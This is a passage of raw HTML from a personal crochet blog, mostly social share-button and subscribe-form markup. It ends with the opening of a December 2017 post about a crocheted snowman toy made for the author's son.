onclick="essb.window(&#39;https://www.facebook.com/sharer/sharer.php?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21&#39;,&#39;facebook&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_facebook"></span><span class=essb_network_name>Facebook</span></a></li><li class="essb_item essb_link_twitter nolightbox"> <a href=# title onclick="essb.window(&#39;https://twitter.com/intent/tweet?text=Merry+Christmas%21&amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;counturl=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;twitter&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_twitter"></span><span class=essb_network_name>Twitter</span></a></li><li class="essb_item essb_link_google nolightbox"> <a href="https://plus.google.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://plus.google.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;google&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_google"></span><span class=essb_network_name>Google+</span></a></li><li class="essb_item essb_link_pinterest nolightbox"> <a href=# title onclick="essb.pinterest_picker(&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pinterest"></span><span class=essb_network_name>Pinterest</span></a></li><li class="essb_item essb_link_linkedin nolightbox"> <a href="https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Merry+Christmas%21&amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://www.linkedin.com/shareArticle?mini=true&amp;ro=true&amp;trk=EasySocialShareButtons&amp;title=Merry+Christmas%21&amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;linkedin&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_linkedin"></span><span class=essb_network_name>LinkedIn</span></a></li><li class="essb_item essb_link_digg nolightbox"> <a href="http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21" title onclick="essb.window(&#39;http://digg.com/submit?phase=2amp;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21&#39;,&#39;digg&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_digg"></span><span class=essb_network_name>Digg</span></a></li><li class="essb_item essb_link_del nolightbox"> <a href="https://del.icio.us/login?log=out&provider=essb&title=Merry+Christmas%21&url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&v=5" title onclick="essb.window(&#39;https://del.icio.us/login?log=out&provider=essb&title=Merry+Christmas%21&url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&v=5&#39;,&#39;del&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_del"></span><span class=essb_network_name>Del</span></a></li><li class="essb_item essb_link_stumbleupon nolightbox"> <a href="http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.stumbleupon.com/badge/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;stumbleupon&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_stumbleupon"></span><span class=essb_network_name>StumbleUpon</span></a></li><li class="essb_item essb_link_tumblr nolightbox"> <a href="http://tumblr.com/share?s=&v=3&t=Merry+Christmas%21&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.window(&#39;http://tumblr.com/share?s=&v=3&t=Merry+Christmas%21&u=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&#39;,&#39;tumblr&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_tumblr"></span><span class=essb_network_name>Tumblr</span></a></li><li class="essb_item essb_link_vk nolightbox"> <a href="http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://vkontakte.ru/share.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;vk&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_vk"></span><span class=essb_network_name>VKontakte</span></a></li><li class="essb_item essb_link_print nolightbox"> <a href="http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.printfriendly.com/print/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;print_friendly&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_print"></span><span class=essb_network_name>Print</span></a></li><li class="essb_item essb_link_mail nolightbox"> <a href=# title onclick="essb_open_mailform(&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mail"></span><span class=essb_network_name>Email</span></a></li><li class="essb_item essb_link_flattr nolightbox"> <a href="https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&title=Merry%2BChristmas%2521&description=+Dear+friends%21+I+wish+you+the+most+wonderful+Holiday+Season+filled+with+happiness+and+cheer%21+Thank+you+for+visiting+this+little+place%21+Love+you%21+Petra+%E2%99%A1%E2%99%A1%E2%99%A1+&language=sq_AL&tags=&hidden=0&category=text" title onclick="essb.window(&#39;https://flattr.com/submit/auto?user_id=&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&title=Merry%2BChristmas%2521&description=+Dear+friends%21+I+wish+you+the+most+wonderful+Holiday+Season+filled+with+happiness+and+cheer%21+Thank+you+for+visiting+this+little+place%21+Love+you%21+Petra+%E2%99%A1%E2%99%A1%E2%99%A1+&language=sq_AL&tags=&hidden=0&category=text&#39;,&#39;flattr&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flattr"></span><span class=essb_network_name>Flattr</span></a></li><li class="essb_item essb_link_reddit nolightbox"> <a href="http://reddit.com/submit?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21" title onclick="essb.window(&#39;http://reddit.com/submit?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21&#39;,&#39;reddit&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_reddit"></span><span class=essb_network_name>Reddit</span></a></li><li class="essb_item essb_link_buffer nolightbox"> <a href="https://bufferapp.com/add?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&text=Merry+Christmas%21&via=&picture=&count=horizontal&source=button" title onclick="essb.window(&#39;https://bufferapp.com/add?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&text=Merry+Christmas%21&via=&picture=&count=horizontal&source=button&#39;,&#39;buffer&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_buffer"></span><span class=essb_network_name>Buffer</span></a></li><li class="essb_item essb_link_love nolightbox"> <a href=# title onclick="essb.loveThis(&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_love"></span><span class=essb_network_name>Love This</span></a></li><li class="essb_item essb_link_weibo nolightbox"> <a href="http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&pic=" title onclick="essb.window(&#39;http://service.weibo.com/share/share.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&pic=&#39;,&#39;weibo&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_weibo"></span><span class=essb_network_name>Weibo</span></a></li><li class="essb_item essb_link_pocket nolightbox"> <a href="https://getpocket.com/save?title=Merry+Christmas%21&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.window(&#39;https://getpocket.com/save?title=Merry+Christmas%21&url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&#39;,&#39;pocket&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_pocket"></span><span class=essb_network_name>Pocket</span></a></li><li class="essb_item essb_link_xing nolightbox"> <a href="https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://www.xing.com/social_plugins/share?h=1;url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;xing&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_xing"></span><span class=essb_network_name>Xing</span></a></li><li class="essb_item essb_link_ok nolightbox"> <a href="http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.odnoklassniki.ru/dk?st.cmd=addShare&st.s=1&st._surl=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;ok&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_ok"></span><span class=essb_network_name>Odnoklassniki</span></a></li><li class="essb_item essb_link_mwp nolightbox"> <a href="http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.window(&#39;http://managewp.org/share/form?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&#39;,&#39;mwp&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mwp"></span><span class=essb_network_name>ManageWP.org</span></a></li><li class="essb_item essb_link_whatsapp nolightbox"> <a href="whatsapp://send?text=Merry%20Christmas!%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.tracking_only('', 'whatsapp', '889394355', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_whatsapp"></span><span class=essb_network_name>WhatsApp</span></a></li><li class="essb_item essb_link_meneame nolightbox"> <a href="http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://www.meneame.net/submit.php?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;meneame&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meneame"></span><span class=essb_network_name>Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&n=Merry+Christmas%21" title onclick="essb.window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&n=Merry+Christmas%21&#39;,&#39;blogger&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_blogger"></span><span class=essb_network_name>Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21" title onclick="essb.window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21&#39;,&#39;amazon&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_amazon"></span><span class=essb_network_name>Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://compose.mail.yahoo.com/?body=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;yahoomail&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yahoomail"></span><span class=essb_network_name>Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Merry+Christmas%21&body=http://zoomyummy.com/2017/12/23/merry-christmas-7/&ui=2&tf=1" title onclick="essb.window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Merry+Christmas%21&body=http://zoomyummy.com/2017/12/23/merry-christmas-7/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_gmail"></span><span class=essb_network_name>Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Merry+Christmas%21&body=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Merry+Christmas%21&body=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;aol&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_aol"></span><span class=essb_network_name>AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&h=Merry+Christmas%21" title onclick="essb.window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&h=Merry+Christmas%21&#39;,&#39;newsvine&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_newsvine"></span><span class=essb_network_name>Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21" title onclick="essb.window(&#39;https://news.ycombinator.com/submitlink?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&t=Merry+Christmas%21&#39;,&#39;hackernews&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_hackernews"></span><span class=essb_network_name>HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21" title onclick="essb.window(&#39;http://www.evernote.com/clip.action?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&#39;,&#39;evernote&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_evernote"></span><span class=essb_network_name>Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://myspace.com/post?u=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;myspace&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_myspace"></span><span class=essb_network_name>MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&description=" title onclick="essb.window(&#39;http://connect.mail.ru/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&description=&#39;,&#39;mailru&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mailru"></span><span class=essb_network_name>Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21" title onclick="essb.window(&#39;https://www.viadeo.com/?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&amp;title=Merry+Christmas%21&#39;,&#39;viadeo&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viadeo"></span><span class=essb_network_name>Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="https://social-plugins.line.me/lineit/share?url=http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.tracking_only('', 'line', '889394355', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_line"></span><span class=essb_network_name>Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21" title onclick="essb.window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&#39;,&#39;flipboard&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_flipboard"></span><span class=essb_network_name>Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href=#comments title onclick="essb.tracking_only('', 'comments', '889394355', true);" target=_self rel=nofollow ><span class="essb_icon essb_icon_comments"></span><span class=essb_network_name>Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&image=&yumtype=button" title onclick="essb.window(&#39;http://www.yummly.com/urb/verify?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&image=&yumtype=button&#39;,&#39;yummly&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yummly"></span><span class=essb_network_name>Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=Merry%20Christmas!%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.window(&#39;sms:&body=Merry%20Christmas!%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&#39;,&#39;sms&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_sms"></span><span class=essb_network_name>SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=Merry%20Christmas!%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.tracking_only('', 'viber', '889394355', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_viber"></span><span class=essb_network_name>Viber</span></a></li><li class="essb_item essb_link_telegram nolightbox"> <a href="tg://msg?text=Merry%20Christmas!%20http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.tracking_only('', 'telegram', '889394355', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_telegram"></span><span class=essb_network_name>Telegram</span></a></li><li class="essb_item essb_link_subscribe nolightbox"> <a href=# title onclick="essb.toggle_subscribe('889394355'); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_subscribe"></span><span class=essb_network_name>Subscribe</span></a></li><li class="essb_item essb_link_skype nolightbox"> <a href="https://web.skype.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://web.skype.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;skype&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_skype"></span><span class=essb_network_name>Skype</span></a></li><li class="essb_item essb_link_messenger nolightbox"> <a href="https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/12/23/merry-christmas-7/&redirect_uri=https://facebook.com" title onclick="essb.window(&#39;https://www.facebook.com/dialog/send?app_id=&link=http://zoomyummy.com/2017/12/23/merry-christmas-7/&redirect_uri=https://facebook.com&#39;,&#39;messenger&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_messenger"></span><span class=essb_network_name>Facebook Messenger</span></a></li><li class="essb_item essb_link_kakaotalk nolightbox"> <a href="https://story.kakao.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://story.kakao.com/share?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;kakaotalk&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_kakaotalk"></span><span class=essb_network_name>Kakao</span></a></li><li class="essb_item essb_link_livejournal nolightbox"> <a href="http://www.livejournal.com/update.bml?subject=Merry Christmas!&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F%22%3EMerry+Christmas%21%3C%2Fa%3E" title onclick="essb.window(&#39;http://www.livejournal.com/update.bml?subject=Merry Christmas!&event=%3Ca+href%3D%22http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F%22%3EMerry+Christmas%21%3C%2Fa%3E&#39;,&#39;livejournal&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_livejournal"></span><span class=essb_network_name>LiveJournal</span></a></li><li class="essb_item essb_link_yammer nolightbox"> <a href="https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Merry%20Christmas! http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F" title onclick="essb.window(&#39;https://www.yammer.com/messages/new?login=true&amp;trk_event=yammer_share&amp;status=Merry%20Christmas! http%3A%2F%2Fzoomyummy.com%2F2017%2F12%2F23%2Fmerry-christmas-7%2F&#39;,&#39;yammer&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_yammer"></span><span class=essb_network_name>Yammer</span></a></li><li class="essb_item essb_link_meetedgar nolightbox"> <a href="javascript:(function()%7B!function()%7Bvar e%3Ddocument.getElementsByTagName(&quot;head&quot;)%5B0%5D,t%3Ddocument.createElement(&quot;script&quot;)%3Bt.type%3D&quot;text/javascript&quot;,t.src%3D&quot;//app.meetedgar.com/share.js%3F&quot;%2BMath.floor(99999*Math.random()),e.appendChild(t)%7D()%7D)()%3B" title onclick="essb.tracking_only('', 'meetedgar', '889394355', true);" target=_blank rel=nofollow ><span class="essb_icon essb_icon_meetedgar"></span><span class=essb_network_name>Edgar</span></a></li><li class="essb_item essb_link_fintel nolightbox"> <a href="https://fintel.io/submit?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://fintel.io/submit?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;fintel&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_fintel"></span><span class=essb_network_name>Fintel</span></a></li><li class="essb_item essb_link_mix nolightbox"> <a href="https://mix.com/extension/add?source=http://zoomyummy.com/2017/12/23/merry-christmas-7/" title onclick="essb.window(&#39;https://mix.com/extension/add?source=http://zoomyummy.com/2017/12/23/merry-christmas-7/&#39;,&#39;mix&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_mix"></span><span class=essb_network_name>Mix</span></a></li><li class="essb_item essb_link_instapaper nolightbox"> <a href="https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&description=" title onclick="essb.window(&#39;https://www.instapaper.com/hello2?url=http://zoomyummy.com/2017/12/23/merry-christmas-7/&title=Merry+Christmas%21&description=&#39;,&#39;instapaper&#39;,&#39;889394355&#39;); return false;" target=_blank rel=nofollow ><span class="essb_icon essb_icon_instapaper"></span><span class=essb_network_name>Instapaper</span></a></li></ul></div></div></div><div class="essb_morepopup_shadow essb_morepopup_shadow_768329166" onclick="essb.toggle_less_popup('768329166'); return false;"></div><div class="essb-subscribe-form essb-subscribe-form-889394355 essb-subscribe-form-popup" data-popup=1 style="display: none;"><div class="essb-subscribe-form-content essb-subscribe-from-design1" data-position=sharebuttons-more data-design=design1><h4 class="essb-subscribe-form-content-title">Join our list</h4><p class=essb-subscribe-form-content-text>Subscribe to our mailing list and get interesting stuff and updates to your email inbox.</p><form action="https://zoomyummy.com?essb3_subscribe_nonce=771d655b92&essb-malchimp-signup=1" method=post class=essb-subscribe-from-content-form id=essb-subscribe-from-content-form-mailchimp><input class=essb-subscribe-form-content-email-field type=text value placeholder="Enter your email here" name=mailchimp_email><input class=submit name=submit type=submit value="Sign Up Now" onclick="essb.ajax_subscribe('889394355', event);"></form><div class=essb-subscribe-loader> <svg version=1.1 id=loader-1 xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink x=0px y=0px width=40px height=40px viewBox="0 0 50 50" style="enable-background:new 0 0 50 50;" xml:space=preserve> <path fill=#000 d=M43.935,25.145c0-10.318-8.364-18.683-18.683-18.683c-10.318,0-18.683,8.365-18.683,18.683h4.068c0-8.071,6.543-14.615,14.615-14.615c8.072,0,14.615,6.543,14.615,14.615H43.935z> <animateTransform attributeType="xml" attributeName="transform" type="rotate" from="0 25 25" to="360 25 25" dur="0.6s" repeatCount="indefinite"/> </path> </svg></div><p class="essb-subscribe-form-content-success essb-subscribe-form-result-message">Thank you for subscribing.</p><p class="essb-subscribe-form-content-error essb-subscribe-form-result-message">Something went wrong.</p><div class=clear></div><p class=essb-subscribe-form-content-footer>We respect your privacy and take protecting it seriously</p></div><button type=button class=essb-subscribe-form-close onclick="essb.subscribe_popup_close('889394355');">x</button></div><div class="essb-subscribe-form-overlay essb-subscribe-form-overlay-889394355" onclick="essb.subscribe_popup_close('889394355');"></div></div><footer class=entry-meta> <span class=cat-links><span class=screen-reader-text>Categories </span><a href=https://zoomyummy.com/category/uncategorized/ rel="category tag">Uncategorized</a></span><span class=comments-link><a href=https://zoomyummy.com/2017/12/23/merry-christmas-7/#comments rel=nofollow>10 Comments</a></span></footer></div></article><div class=googleadbox> <script async src=//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js></script> <ins class=adsbygoogle style=display:inline-block;width:336px;height:280px data-ad-client=ca-pub-5571995028593943 data-ad-slot=7373696885></ins> <script>(adsbygoogle=window.adsbygoogle||[]).push({});</script> </div><article id=post-55148 class="post-55148 post type-post status-publish format-standard hentry category-crochet category-winter tag-christmas tag-crochet tag-snowman tag-winter" itemtype=http://schema.org/CreativeWork itemscope=itemscope><div class=inside-article><header class=entry-header><h2 class="entry-title" itemprop="headline"><a href=https://zoomyummy.com/2017/12/05/crochet-snowman/ rel=bookmark>Crochet Snowman</a></h2><div class=entry-meta> <span class=posted-on><a href=https://zoomyummy.com/2017/12/05/crochet-snowman/ title="9:37 pm" rel=bookmark><time class="entry-date published" datetime=2017-12-05T21:37:30+01:00 itemprop=datePublished>December 5, 2017</time><time class=updated datetime=2017-12-05T21:51:28+01:00 itemprop=dateModified>December 5, 2017</time></a></span> <span class=byline><span class="author vcard" itemtype=http://schema.org/Person itemscope=itemscope itemprop=author>by <a class="url fn n" href=https://zoomyummy.com/author/zoomyummy/ title="View all posts by zoomyummy" rel=author itemprop=url><span class=author-name itemprop=name>zoomyummy</span></a></span></span></div></header><div class=entry-content itemprop=text> <input class=jpibfi type=hidden><p><img src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-3-wm.jpg alt="crochet snowman" width=630 height=945 class="aligncenter size-full wp-image-55157" srcset="https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-3-wm.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-3-wm-267x400.jpg 267w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/12/05/crochet-snowman/ data-jpibfi-post-title="Crochet Snowman" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-3-wm.jpg></p><blockquote><p>Hello dear friends!</p><p>I hope that you are all doing fine.</p><p>I am confirming that I am still here, and crocheting&#8230; Always!</p><p>Actually, I would like to show you my latest creation, a crochet snowman. Ta-dah!</p><p>I&#8217;ve had this snowman kind of idea in my mind for quite some time, I think I&#8217;d even mentioned it in one of my posts here on this blog a couple of years ago, posting a picture of a snowman just being made&#8230; Well, that one never got finished, just until now.</p><p>Having a little boy now, I thought it could be sweet to make something unique for him this winter.</p><p>So, a snowman was born.</p><p>And my baby (well, almost 3 years old baby) likes his new toy friend very very much &#8211; he just grabs him by the hat and off they go together&#8230; 🙂</p><p>&nbsp;<br> &nbsp;</p></blockquote><p><img src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-2-wm-snowflakes-blue.jpg alt="crochet snowman" width=630 height=945 class="aligncenter size-full wp-image-55172" srcset="https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-2-wm-snowflakes-blue.jpg 630w, https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-2-wm-snowflakes-blue-267x400.jpg 267w" sizes="(max-width: 630px) 100vw, 630px" data-jpibfi-post-excerpt data-jpibfi-post-url=https://zoomyummy.com/2017/12/05/crochet-snowman/ data-jpibfi-post-title="Crochet Snowman" data-jpibfi-src=https://zoomyummy.com/wp-content/uploads/2017/12/crochet-snowman-2-wm-snowflakes-blue.jpg></p><blockquote><p>My plan was to make it rather tall. Using an Aran weight yarn (Red Heart Soft) and a 4.5 mm hook it turned out to be almost 18 inches (45 cm) 